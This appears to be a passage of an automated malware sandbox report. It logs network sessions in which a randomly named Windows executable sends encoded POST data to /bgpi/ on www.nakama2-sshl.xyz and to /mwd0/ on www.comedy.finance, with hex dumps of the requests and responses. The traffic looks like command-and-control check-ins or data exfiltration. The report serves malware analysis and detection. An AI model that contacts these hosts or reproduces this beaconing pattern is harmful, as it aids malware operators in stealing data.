                                                                                Data Raw: 31 37 61 62 0d 0a 15 83 5e 00 e0 af f7 7b 97 df a3 2a 3e fe db 7d 17 34 43 d4 7a cd bc ad 11 31 c6 6c a8 62 81 80 c9 16 b1 5d b7 5a d2 91 d4 f7 b6 ba 45 77 6b 1e 7e 54 79 66 bc 5b c6 40 cc cb 4b 1c 6f 76 17 b2 6b 0c 04 b3 c4 ae 14 0b 24 7c fd 47 dc 6b f3 95 33 ff d3 a9 0f 12 55 47 95 9e 1a 24 8a 14 94 e9 51 9f 96 6a 66 77 8b 77 be 2b de 9d 53 f8 57 38 c6 c5 27 29 9e 1d 17 8e cd ec cc be 7d f7 f1 d9 56 12 1b d9 12 38 32 89 3e 14 e4 92 10 fd 94 4b 73 e7 58 22 bf c2 4e 28 4e 54 4e a8 28 51 ef 24 26 72 22 45 28 91 85 10 15 12 25 08 24 8a ea 12 84 04 1d 25 65 28 3a 8a ae 64 19 e6 b2 ae 3d 9f 4d dd cd 42 f2 93 a6 0c fc 2d 13 9d 78 ee e5 d3 67 df 78 e5 0c 2a 4d c5 63 2b 3a 41 c8 39 96 23 6e d0 0b 67 d0 f8 42 6c 45 a5 a9 38 4a 39 d5 7a 8e 19 8c 30 e2 54 14 73 7c 40 71 8c a2 13 e7 40 64 2c bf 40 48 6c 45 27 08 39 c7 72 f4 c2 19 34 be 10 5b c0 e5 8f d7 d7 9f bc 41 c8 15 e6 23 8c 4e a0 04 1c 06 50 73 71 5e 1c 5b 9d e8 04 21 e4 7f 2c 3a 51 09 34 43 b5 82 9c ad e6 58 16 33 54 1a 53 cf 3c 4f 16 b5 5b 81 27 f4 1e [TRUNCATED]
                                                                                Data Ascii: 17ab^{*>}4Cz1lb]ZEwk~Tyf[@Kovk$|Gk3UG$Qjfww+SW8')}V82>KsX"N(NTN(Q$&r"E(%$%e(:d=MB-xgx*Mc+:A9#ngBlE8J9z0Ts|@q@d,@HlE'9r4[A#NPsq^[!,:Q4CX3TS<O['CUtEiI3}L0zY%A+e-(0sd),Xdr&aRFzCs!dSm8d` 5LupK)`.$XNEE%i4d"Ko_3q9Ff],I)nUq3G;w!zF|K?=DE/0bU(bS.kgbkC*VUcY+Ph3Qz+Md@8"U;dl7hWtEXE SUy* H+t;r0ii-b4r)fMeqYs%&!,QTIxqd"MK2*hpSY0bXNsr.0E.}4a3,rxV'/h0KEHiz8C{]
                                                                                Oct 10, 2024 14:39:15.300240040 CEST224INData Raw: f5 36 8f 74 4d 05 49 78 c3 74 49 0a 45 d7 33 b4 47 93 64 92 f6 41 46 2e 4b 66 60 86 f6 f2 57 87 d7 4d a0 a6 1c 48 cd c4 e1 0c ed e5 e3 49 46 c7 75 37 81 05 5b b0 8c 28 c8 66 68 2f cd 43 08 e1 65 14 6f 2a 26 64 a3 81 fa a5 a2 a2 e0 e3 a0 46 53 d1
                                                                                Data Ascii: 6tMIxtIE3GdAF.Kf`WMHIFu7[(fh/Ceo*&dFS8Hi`EiHf.,M!C6@1ZfhoYR#~binTa0)ys FLUP?AA"N'U$`8t&|y
                                                                                Oct 10, 2024 14:39:15.300249100 CEST1236INData Raw: 56 cb e4 6a a9 d2 91 87 25 bb 41 18 3a 61 e8 3b c1 c4 5f ab e7 3b a1 3f 71 82 be bf 4a 6e 31 27 31 b2 4c bb 98 23 2b 6b a1 dd 70 18 3a c1 64 e8 f8 aa 18 45 bb e1 70 e8 04 7e 81 3f 76 90 2c d1 08 34 8b 18 3c 50 72 4a 17 6f 57 e8 8f 9d c1 c8 19 8c
                                                                                Data Ascii: Vj%A:a;_;?qJn1'1L#+kp:dEp~?v,4<PrJoWz8u&F4'OuFS'`:|S)91,!5k<pC?D0 P1LF=48GK84tCN88m .9f#'$B'N8)V%*zF3
                                                                                Oct 10, 2024 14:39:15.300297022 CEST1236INData Raw: 2a 0f 21 3e a2 d6 9f cc 89 0a 81 4b 20 db 6c bc 22 f2 26 e1 b8 42 2e 85 d1 64 14 d5 dd 12 21 8d d4 54 e8 83 5a d3 81 e7 74 c5 f4 78 ab 1a 1e 50 c5 d7 34 4d a1 25 69 68 73 4d d6 e4 3c 8b 67 9a 53 23 c7 be ff fe 7f 60 aa f5 33 39 ad 18 5f cf 5f a4
                                                                                Data Ascii: *!>K l"&B.d!TZtxP4M%ihsM<gS#`39__F>?5hP%+:"O@Z2rX<[5odOrHbn]l%mEPKZ)A+^NS0{4e_*w{LW{3gl@
                                                                                Oct 10, 2024 14:39:15.300307035 CEST448INData Raw: c3 9f bf b8 f7 f3 ed 4f 23 2f 63 0b da cc 0e 2d d4 3a 28 81 66 89 5c 91 a4 60 f2 7c 29 07 aa 72 b6 c2 10 ac 8a ec bb 82 08 fd 42 a0 08 af 78 e5 e8 04 21 a8 dd 7d d5 6e 1f 1e dd bc de 6e be 3e 3a 2c f5 55 bb fd eb d1 7b ef 22 42 e2 96 a6 00 5b a3
                                                                                Data Ascii: O#/c-:(f\`|)rBx!}nn>:,U{"B[|fbb_0bUA]8aUf`4_f`c?pt200I(LHHO2hy5@]`Vohi47T} vb,YVL8
                                                                                Oct 10, 2024 14:39:15.300395012 CEST1236INData Raw: 5b 15 03 8e b5 35 a2 08 ab 24 f7 13 23 f6 fd c1 79 c4 20 05 1a d4 e2 14 81 77 85 11 fd fd 00 c7 ed ee 93 1c 2f f5 e5 8f 32 27 36 00 90 d3 e2 f7 3d 50 09 2b 1f ca 99 00 1e 2e 5a 88 e3 17 5f 78 e9 cc df d3 b7 1f 6a 47 d0 cd 03 8b 98 66 f7 1a c5 57
                                                                                Data Ascii: [5$#y w/2'6=P+.Z_xjGfWM55<e5,^Y!TlZgU!=e3hq>F%4s<ug,CR"B*ZC@3,5c?,jU6SAv!&VS&$l}#R
                                                                                Oct 10, 2024 14:39:15.300405025 CEST224INData Raw: 2b d9 e2 b4 ff df ed d1 cd d9 4f 55 cf 30 f4 63 44 da dd ad 76 b7 7b 9e 30 f8 e1 ac b2 fb 93 76 fb e7 b8 16 3c e8 e9 0e 7e fb 28 b8 16 3f 16 e8 44 65 1f 5d 1b 97 45 ba ae 16 d7 be e5 d8 9e 8c ac b5 76 ac 13 b6 bf 22 ed ef 55 2d 01 72 a8 ee c8 2b
                                                                                Data Ascii: +OU0cDv{0v<~(?De]Ev"U-r+00~].CRscRYqO-}i@) >8A.CgtTzhV{P{M.`2H030sp*qCm8ij}l
                                                                                Oct 10, 2024 14:39:15.300414085 CEST603INData Raw: 8d 5c a2 8c 07 63 fb 3a e7 38 1f 67 ff ce 6c 5a af d0 63 f1 e7 aa a8 2a 98 98 f9 27 17 a0 0c 4b 29 27 94 b3 42 cc 0c ac cc c8 93 cc 49 15 cc 62 55 b1 6d c0 d0 8c b2 8a 7a f9 81 5b b0 bc 27 2b 7f ba f6 06 38 46 8e 42 74 43 0c 10 84 06 c1 32 b4 80
                                                                                Data Ascii: \c:8glZc*'K)'BIbUmz['+8FBtC2*'g_@jh @Q#Q0l4e}w*Ug\/M,kRKmwj=|I(j4N;=kAZi>Fst%4x)>/}~49aZix9-|I{]=K


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                6192.168.2.549959183.181.83.13180760C:\Program Files (x86)\qCxIpusqZONCCjzbpJDffXbRFAcIKoXbBEQoEJrcdiBpRvwrym\ooaSzUjoYqoTW.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Oct 10, 2024 14:39:17.015980005 CEST633OUTPOST /bgpi/ HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.nakama2-sshl.xyz
                                                                                Content-Length: 225
                                                                                Connection: close
                                                                                Cache-Control: no-cache
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Origin: http://www.nakama2-sshl.xyz
                                                                                Referer: http://www.nakama2-sshl.xyz/bgpi/
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:40.0) Gecko/20100101 Firefox/40.1
                                                                                Data Raw: 50 4a 39 4c 3d 56 52 70 4e 71 73 4a 39 48 78 74 58 52 65 64 50 57 51 37 74 76 56 2b 70 31 32 61 6d 68 77 77 77 50 5a 77 46 5a 63 5a 55 69 2f 6e 2f 52 6e 37 4c 32 74 68 7a 56 72 2b 70 2f 43 2f 33 39 6a 30 36 33 6c 42 73 44 67 57 53 45 49 36 6c 77 47 79 53 76 72 6b 31 2f 34 4f 70 77 54 50 74 61 52 37 58 41 5a 37 71 62 4f 55 49 7a 4f 57 50 33 48 4a 58 51 2b 6a 79 52 6b 30 2b 33 75 6b 69 55 4e 4b 51 4d 65 53 55 35 6e 54 55 41 38 70 6b 4e 6c 2f 7a 6b 59 2b 59 36 66 6c 55 6e 79 46 51 4e 64 74 4d 68 74 55 46 44 54 74 56 4e 53 62 5a 61 36 6a 57 49 4b 65 73 66 4b 4d 66 50 76 68 30 39 35 72 71 61 43 71 4a 67 2f 49 7a 71 6c 43 56 46 7a 69 73 4a 76 63 46 57 75 63 72 2b 4e 74 78
                                                                                Data Ascii: PJ9L=VRpNqsJ9HxtXRedPWQ7tvV+p12amhwwwPZwFZcZUi/n/Rn7L2thzVr+p/C/39j063lBsDgWSEI6lwGySvrk1/4OpwTPtaR7XAZ7qbOUIzOWP3HJXQ+jyRk0+3ukiUNKQMeSU5nTUA8pkNl/zkY+Y6flUnyFQNdtMhtUFDTtVNSbZa6jWIKesfKMfPvh095rqaCqJg/IzqlCVFzisJvcFWucr+Ntx
                                                                                Oct 10, 2024 14:39:17.881508112 CEST1236INHTTP/1.1 404 Not Found
                                                                                Server: nginx
                                                                                Date: Thu, 10 Oct 2024 12:39:17 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                Link: <http://nakama2-sshl.xyz/wp-json/>; rel="https://api.w.org/"
                                                                                Content-Encoding: br
                                                                                Data Raw: 31 37 61 62 0d 0a 15 83 5e 00 e0 af f7 7b 97 df a3 2a 3e fe db 7d 17 34 43 d4 7a cd bc ad 11 31 c6 6c a8 62 81 80 c9 16 b1 5d b7 5a d2 91 d4 f7 b6 ba 45 77 6b 1e 7e 54 79 66 bc 5b c6 40 cc cb 4b 1c 6f 76 17 b2 6b 0c 04 b3 c4 ae 14 0b 24 7c fd 47 dc 6b f3 95 33 ff d3 a9 0f 12 55 47 95 9e 1a 24 8a 14 94 e9 51 9f 96 6a 66 77 8b 77 be 2b de 9d 53 f8 57 38 c6 c5 27 29 9e 1d 17 8e cd ec cc be 7d f7 f1 d9 56 12 1b d9 12 38 32 89 3e 14 e4 92 10 fd 94 4b 73 e7 58 22 bf c2 4e 28 4e 54 4e a8 28 51 ef 24 26 72 22 45 28 91 85 10 15 12 25 08 24 8a ea 12 84 04 1d 25 65 28 3a 8a ae 64 19 e6 b2 ae 3d 9f 4d dd cd 42 f2 93 a6 0c fc 2d 13 9d 78 ee e5 d3 67 df 78 e5 0c 2a 4d c5 63 2b 3a 41 c8 39 96 23 6e d0 0b 67 d0 f8 42 6c 45 a5 a9 38 4a 39 d5 7a 8e 19 8c 30 e2 54 14 73 7c 40 71 8c a2 13 e7 40 64 2c bf 40 48 6c 45 27 08 39 c7 72 f4 c2 19 34 be 10 5b c0 e5 8f d7 d7 9f bc 41 c8 15 e6 23 8c 4e a0 04 1c 06 50 73 71 5e 1c 5b 9d e8 04 21 e4 7f 2c 3a 51 09 34 43 b5 82 9c ad e6 58 16 33 54 1a 53 cf 3c 4f 16 b5 5b 81 27 f4 1e [TRUNCATED]
                                                                                Data Ascii: 17ab^{*>}4Cz1lb]ZEwk~Tyf[@Kovk$|Gk3UG$Qjfww+SW8')}V82>KsX"N(NTN(Q$&r"E(%$%e(:d=MB-xgx*Mc+:A9#ngBlE8J9z0Ts|@q@d,@HlE'9r4[A#NPsq^[!,:Q4CX3TS<O['CUtEiI3}L0zY%A+e-(0sd),Xdr&aRFzCs!dSm8d` 5LupK)`.$XNEE%i4d"Ko_3q9Ff],I)nUq3G;w!zF|K?=DE/0bU(bS.kgbkC*VUcY+Ph3Qz+Md@8"U;dl7hWtEXE SUy* H+t;r0ii-b4r)fMeqYs%&!,QTIxqd"MK2*hpSY0bXNsr.0E.}4a3,rxV'/h0KEHiz8C{]
                                                                                Oct 10, 2024 14:39:17.881541967 CEST1236INData Raw: f5 36 8f 74 4d 05 49 78 c3 74 49 0a 45 d7 33 b4 47 93 64 92 f6 41 46 2e 4b 66 60 86 f6 f2 57 87 d7 4d a0 a6 1c 48 cd c4 e1 0c ed e5 e3 49 46 c7 75 37 81 05 5b b0 8c 28 c8 66 68 2f cd 43 08 e1 65 14 6f 2a 26 64 a3 81 fa a5 a2 a2 e0 e3 a0 46 53 d1
                                                                                Data Ascii: 6tMIxtIE3GdAF.Kf`WMHIFu7[(fh/Ceo*&dFS8Hi`EiHf.,M!C6@1ZfhoYR#~binTa0)ys FLUP?AA"N'U$`8t&|yVj%A:a;_
                                                                                Oct 10, 2024 14:39:17.881558895 CEST448INData Raw: 48 df b4 98 4e 66 49 26 dd 2d 49 f8 f3 4d 49 f7 6d 4a 34 a0 07 90 f4 f6 65 2e f5 fb 89 3a a2 9d 82 00 2b e9 07 3b 0b 7d 23 45 60 49 e3 d0 b1 e8 fb 02 1d 92 92 05 27 67 85 b5 e4 ea 2d 6b 45 cf f1 bb 8f 2e b8 4a 2a 85 a1 a9 21 b9 54 15 19 3f 79 1f
                                                                                Data Ascii: HNfI&-IMImJ4e.:+;}#E`I'g-kE.J*!T?yY\W`B{8:2;r2%2= mtk&,`7z*Eq2F;.]=#ONcE8lcX+GPL*!>K l"&
                                                                                Oct 10, 2024 14:39:17.881601095 CEST1236INData Raw: 7b 4c b0 c3 f8 57 18 13 7b 33 1e 67 89 f6 0e de 6c 40 ad bd c0 0d 02 b7 bf 07 72 85 d4 81 d6 b0 10 15 80 35 0e 25 07 da 1e 25 4c cc 0f 03 99 1f 23 3d f3 3c 5a 33 77 e9 4a 55 78 43 9c d7 bc ac c9 81 96 c2 c3 c8 8b c7 16 a7 30 cb 8b 11 cd 0c 90 05
                                                                                Data Ascii: {LW{3gl@r5%%L#=<Z3wJUxC0(Pj:zz8L~y0Yg_b%,MWWSXNvcOaDnu{B-BEs$H69Y-rm;^wmJ)=#],}_
                                                                                Oct 10, 2024 14:39:17.881618023 CEST1236INData Raw: c9 c0 ca 2c 59 56 80 c1 b1 a5 ef de ac 4c b0 1f e0 38 d2 35 15 05 3f 01 21 8e 8f ee bf 73 f4 9b 7b 3f 7d 77 fd d1 c3 6b 47 d7 ff 3b f2 74 4d 45 7c fc bb bf 3e be 7b f3 a7 6f af 1e 7f fc 97 f0 e8 bd 77 db cd ff b6 9b cf d0 65 84 67 91 3e 8e 8f 6e
                                                                                Data Ascii: ,YVL85?!s{?}wkG;tME|>{oweg>n~:99C0=?n?x|vsmn?OVF7%,d{QNQNI]JQ()Ycq`<&Fa9U"Wc[5$#y
                                                                                Oct 10, 2024 14:39:17.881684065 CEST1051INData Raw: 33 86 c3 7b f1 85 97 ce d0 92 9c c4 fc 82 39 78 26 4a 64 06 52 25 39 6f f7 2d 9d ae 93 b6 76 f3 e1 7f a9 2f 9f 50 b9 6e bb fd b4 dd bd d5 6e bf 6f 77 0f da ed df da 7e ef 5b 6e b7 1f 3c fe af 1f da ed db ed e6 de e3 bb 37 1f 3d bc f6 f3 e6 d6 d1
                                                                                Data Ascii: 3{9x&JdR%9o-v/Pnnow~[n<7=wj&?w|fO}<\Rj:,ZdR3g*3Ki@1,Z,UZ<R<1R<Ol51c7?XBV{$<P7B8;a%+OU0cD


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                7192.168.2.549976183.181.83.13180760C:\Program Files (x86)\qCxIpusqZONCCjzbpJDffXbRFAcIKoXbBEQoEJrcdiBpRvwrym\ooaSzUjoYqoTW.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Oct 10, 2024 14:39:19.654082060 CEST1650OUTPOST /bgpi/ HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.nakama2-sshl.xyz
                                                                                Content-Length: 1241
                                                                                Connection: close
                                                                                Cache-Control: no-cache
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Origin: http://www.nakama2-sshl.xyz
                                                                                Referer: http://www.nakama2-sshl.xyz/bgpi/
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:40.0) Gecko/20100101 Firefox/40.1
                                                                                Data Raw: 50 4a 39 4c 3d 56 52 70 4e 71 73 4a 39 48 78 74 58 52 65 64 50 57 51 37 74 76 56 2b 70 31 32 61 6d 68 77 77 77 50 5a 77 46 5a 63 5a 55 69 2f 76 2f 52 56 7a 4c 35 71 31 7a 55 72 2b 70 32 69 2f 32 39 6a 31 6d 33 68 73 6c 44 67 4b 43 45 4b 43 6c 71 6c 4b 53 34 75 49 31 6d 49 4f 70 34 7a 4f 71 48 42 37 47 41 5a 72 75 62 4f 45 49 7a 4f 57 50 33 45 68 58 48 36 58 79 54 6b 30 35 39 4f 6c 74 44 39 4c 33 4d 61 2f 68 35 6b 2f 45 41 4d 4a 6b 55 46 76 7a 6d 4e 71 59 6c 76 6c 57 6b 79 46 49 4e 64 68 66 68 70 4e 2b 44 53 59 49 4e 51 4c 5a 66 65 79 66 55 36 4c 30 4a 38 45 6a 46 64 5a 32 6e 74 6a 77 59 41 75 70 69 39 4a 4a 33 78 61 2f 44 44 57 64 66 63 63 41 56 36 4e 38 77 37 4e 2b 76 50 36 7a 68 6a 41 50 35 35 6e 4b 5a 46 32 79 71 50 56 31 6a 55 59 30 7a 68 6e 4f 59 2b 79 70 54 51 4d 42 35 63 64 46 57 62 72 4a 67 6b 44 52 36 4f 6c 44 77 64 49 32 61 65 57 54 7a 6c 44 6e 74 46 77 61 37 6e 56 57 43 61 34 6c 5a 4e 35 5a 7a 46 47 72 2b 69 52 37 4d 71 66 64 77 5a 73 44 41 63 34 30 59 57 77 37 32 48 2b 72 61 52 4a 6c 59 [TRUNCATED]
                                                                                Data Ascii: PJ9L=VRpNqsJ9HxtXRedPWQ7tvV+p12amhwwwPZwFZcZUi/v/RVzL5q1zUr+p2i/29j1m3hslDgKCEKClqlKS4uI1mIOp4zOqHB7GAZrubOEIzOWP3EhXH6XyTk059OltD9L3Ma/h5k/EAMJkUFvzmNqYlvlWkyFINdhfhpN+DSYINQLZfeyfU6L0J8EjFdZ2ntjwYAupi9JJ3xa/DDWdfccAV6N8w7N+vP6zhjAP55nKZF2yqPV1jUY0zhnOY+ypTQMB5cdFWbrJgkDR6OlDwdI2aeWTzlDntFwa7nVWCa4lZN5ZzFGr+iR7MqfdwZsDAc40YWw72H+raRJlYT/YFmwJENnnRhu2CYNgD+kCOcg8HXr5aiqU1oF+nr0BGkAv3Ho7vq5x2V0EUfiHjtFGBWfgEhUyIfP2KGufNJoOvI11vt4ZwQcku4Fli2H2xwabEvtzJIGAtkmakdT5GAXjJ4EMXTqWmi4qtc2DjboOytNQ4957CjIDlbExwMZ2qltWSRdd/pxNBL+5xMsKHT17Ztd5JrlMfV/fe7JLpfuM4Z6AC9vnyRlfKwIjowjU0dbwZLl/Q4WcM9W6Tq3Prf290qXSlnrbcDf4jBpjM2u+fyBq4HJFb/VLdUe+e3IlMVApCb4TtOja2QRK09pQ8xLGP5Pkr4GdyKDHczyBt3otSphgx/gAHX+YuwLWv6jmaRLCWwjhIy+2KgxmllQ29DU2gH/kBktPb0Wc+D3cBpQwsfYkANFAmU61GQ1dkijyU2IrNT30IBL/Ljgh0vInwd78fcNUbvVhoYWmMcsPzg6cZLH+sFW/0uJoc8PdUO2m7UavtojdF2VVdRIsV35h5SvcsdFu1VGTVI8VnOBYCF/+K7VX/55iZAtZANJyA319rJgUrfpUXN9UubL3jjwm/NAuRunnc3plQ2+Pq7mB9ukVbfrbPD74nsJnoEDU/rqm1p3EfvX4U9cwb0eMdZt5WTTcqBsKV9NGnl0qCZlppsCef8iMpYT7Lrv [TRUNCATED]
                                                                                Oct 10, 2024 14:39:20.434947968 CEST1236INHTTP/1.1 404 Not Found
                                                                                Server: nginx
                                                                                Date: Thu, 10 Oct 2024 12:39:20 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                Link: <http://nakama2-sshl.xyz/wp-json/>; rel="https://api.w.org/"
                                                                                Content-Encoding: br
                                                                                Data Raw: 31 37 61 62 0d 0a 15 83 5e 00 e0 af f7 7b 97 df a3 2a 3e fe db 7d 17 34 43 d4 7a cd bc ad 11 31 c6 6c a8 62 81 80 c9 16 b1 5d b7 5a d2 91 d4 f7 b6 ba 45 77 6b 1e 7e 54 79 66 bc 5b c6 40 cc cb 4b 1c 6f 76 17 b2 6b 0c 04 b3 c4 ae 14 0b 24 7c fd 47 dc 6b f3 95 33 ff d3 a9 0f 12 55 47 95 9e 1a 24 8a 14 94 e9 51 9f 96 6a 66 77 8b 77 be 2b de 9d 53 f8 57 38 c6 c5 27 29 9e 1d 17 8e cd ec cc be 7d f7 f1 d9 56 12 1b d9 12 38 32 89 3e 14 e4 92 10 fd 94 4b 73 e7 58 22 bf c2 4e 28 4e 54 4e a8 28 51 ef 24 26 72 22 45 28 91 85 10 15 12 25 08 24 8a ea 12 84 04 1d 25 65 28 3a 8a ae 64 19 e6 b2 ae 3d 9f 4d dd cd 42 f2 93 a6 0c fc 2d 13 9d 78 ee e5 d3 67 df 78 e5 0c 2a 4d c5 63 2b 3a 41 c8 39 96 23 6e d0 0b 67 d0 f8 42 6c 45 a5 a9 38 4a 39 d5 7a 8e 19 8c 30 e2 54 14 73 7c 40 71 8c a2 13 e7 40 64 2c bf 40 48 6c 45 27 08 39 c7 72 f4 c2 19 34 be 10 5b c0 e5 8f d7 d7 9f bc 41 c8 15 e6 23 8c 4e a0 04 1c 06 50 73 71 5e 1c 5b 9d e8 04 21 e4 7f 2c 3a 51 09 34 43 b5 82 9c ad e6 58 16 33 54 1a 53 cf 3c 4f 16 b5 5b 81 27 f4 1e [TRUNCATED]
                                                                                Data Ascii: 17ab^{*>}4Cz1lb]ZEwk~Tyf[@Kovk$|Gk3UG$Qjfww+SW8')}V82>KsX"N(NTN(Q$&r"E(%$%e(:d=MB-xgx*Mc+:A9#ngBlE8J9z0Ts|@q@d,@HlE'9r4[A#NPsq^[!,:Q4CX3TS<O['CUtEiI3}L0zY%A+e-(0sd),Xdr&aRFzCs!dSm8d` 5LupK)`.$XNEE%i4d"Ko_3q9Ff],I)nUq3G;w!zF|K?=DE/0bU(bS.kgbkC*VUcY+Ph3Qz+Md@8"U;dl7hWtEXE SUy* H+t;r0ii-b4r)fMeqYs%&!,QTIxqd"MK2*hpSY0bXNsr.0E.}4a3,rxV'/h0KEHiz8C{]
                                                                                Oct 10, 2024 14:39:20.434971094 CEST1236INData Raw: f5 36 8f 74 4d 05 49 78 c3 74 49 0a 45 d7 33 b4 47 93 64 92 f6 41 46 2e 4b 66 60 86 f6 f2 57 87 d7 4d a0 a6 1c 48 cd c4 e1 0c ed e5 e3 49 46 c7 75 37 81 05 5b b0 8c 28 c8 66 68 2f cd 43 08 e1 65 14 6f 2a 26 64 a3 81 fa a5 a2 a2 e0 e3 a0 46 53 d1
                                                                                Data Ascii: 6tMIxtIE3GdAF.Kf`WMHIFu7[(fh/Ceo*&dFS8Hi`EiHf.,M!C6@1ZfhoYR#~binTa0)ys FLUP?AA"N'U$`8t&|yVj%A:a;_
                                                                                Oct 10, 2024 14:39:20.434988022 CEST1236INData Raw: 48 df b4 98 4e 66 49 26 dd 2d 49 f8 f3 4d 49 f7 6d 4a 34 a0 07 90 f4 f6 65 2e f5 fb 89 3a a2 9d 82 00 2b e9 07 3b 0b 7d 23 45 60 49 e3 d0 b1 e8 fb 02 1d 92 92 05 27 67 85 b5 e4 ea 2d 6b 45 cf f1 bb 8f 2e b8 4a 2a 85 a1 a9 21 b9 54 15 19 3f 79 1f
                                                                                Data Ascii: HNfI&-IMImJ4e.:+;}#E`I'g-kE.J*!T?yY\W`B{8:2;r2%2= mtk&,`7z*Eq2F;.]=#ONcE8lcX+GPL*!>K l"&
                                                                                Oct 10, 2024 14:39:20.435168982 CEST1236INData Raw: ee 62 29 f8 9a 18 99 62 d5 69 2c b5 5d 6d 08 4d 49 22 57 a8 e1 f0 8f ce 4d a9 21 cc 40 d5 c3 3d 17 68 5a d2 d7 9f 28 38 a1 81 c8 da 53 6a ae 1f e3 95 de 49 ab 23 d9 fe 3a 1d a0 eb 77 3a 9d c8 2b 81 66 b1 d5 89 12 99 ad e7 57 9d 1f 94 92 6a e0 0f
                                                                                Data Ascii: b)bi,]mMI"WM!@=hZ(8SjI#:w:+fWjP$!+A\IaHMoS2@,>Wp5]RD)NAB3\gSUmq{9o9vn/v~_}t~wxO#/c-:(
                                                                                Oct 10, 2024 14:39:20.435184956 CEST1236INData Raw: 01 8b 74 82 c9 1c 51 39 f4 ac 0f 92 18 ec 31 6c 96 bf d2 cd 97 ed e6 8b 76 7b a3 dd 5e 6b 37 b7 db cd b5 9f be fb ae dd 7c 6d a3 6c 39 e4 1d 0d d5 e2 6d bb 23 2f e3 f1 6e 38 e4 e4 59 e2 55 60 d9 1c 57 eb b8 6d b5 86 1c cd 8e ee d0 7e fa 80 aa b4
                                                                                Data Ascii: tQ91lv{^k7|ml9m#/n8YU`Wm~GP`ph.U=s8Mma2\9M%DB8F5)gvs~n70E3jEDD[%j.AI*fyTUPg]!1*l
                                                                                Oct 10, 2024 14:39:20.435200930 CEST263INData Raw: 1b ba 82 2d e2 8c 1d d0 55 a3 78 6b 88 d2 ac 62 e2 bc f7 30 20 7f ff f4 5f 50 97 35 76 fd f1 2e 27 f9 54 3a d0 9e d2 8b 5a c3 07 3b 18 e9 a7 59 1a 80 6e 9f 7c bf 6c f1 c5 ec 09 6d 7e 35 bd 27 c3 a6 6b f8 63 aa 4a 2c 9b db 09 d5 60 e6 f0 b5 b3 c6
                                                                                Data Ascii: -Uxkb0 _P5v.'T:Z;Yn|lm~5'kcJ,`mV5>MS2&~3'TnAd<{>^B55McFKNgKEeTrqZq;r[@=+7eZV:[bdFtnCN


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                8192.168.2.549983183.181.83.13180760C:\Program Files (x86)\qCxIpusqZONCCjzbpJDffXbRFAcIKoXbBEQoEJrcdiBpRvwrym\ooaSzUjoYqoTW.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Oct 10, 2024 14:39:22.191097975 CEST344OUTGET /bgpi/?PJ9L=YTBtpahDWzdXKpondkv4unjklxOnnU8zYfk5eJgvm8+FRFKzirlrJKz42G/aqidm6CRQYg/EPrqYrXSvoqI47MOsphbaLGnzH8fia9Q2y/K0qDU8XdfqR00415ssDP2dWw==&2z=PtRhXbM HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Host: www.nakama2-sshl.xyz
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:40.0) Gecko/20100101 Firefox/40.1
                                                                                Oct 10, 2024 14:39:23.028951883 CEST473INHTTP/1.1 301 Moved Permanently
                                                                                Server: nginx
                                                                                Date: Thu, 10 Oct 2024 12:39:22 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Content-Length: 0
                                                                                Connection: close
                                                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                X-Redirect-By: WordPress
                                                                                Location: http://nakama2-sshl.xyz/bgpi/?PJ9L=YTBtpahDWzdXKpondkv4unjklxOnnU8zYfk5eJgvm8+FRFKzirlrJKz42G/aqidm6CRQYg/EPrqYrXSvoqI47MOsphbaLGnzH8fia9Q2y/K0qDU8XdfqR00415ssDP2dWw==&2z=PtRhXbM


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                9192.168.2.54998413.248.169.4880760C:\Program Files (x86)\qCxIpusqZONCCjzbpJDffXbRFAcIKoXbBEQoEJrcdiBpRvwrym\ooaSzUjoYqoTW.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Oct 10, 2024 14:39:28.123059988 CEST607OUTPOST /mwd0/ HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.comedy.finance
                                                                                Content-Length: 205
                                                                                Connection: close
                                                                                Cache-Control: no-cache
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Origin: http://www.comedy.finance
                                                                                Referer: http://www.comedy.finance/mwd0/
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:40.0) Gecko/20100101 Firefox/40.1
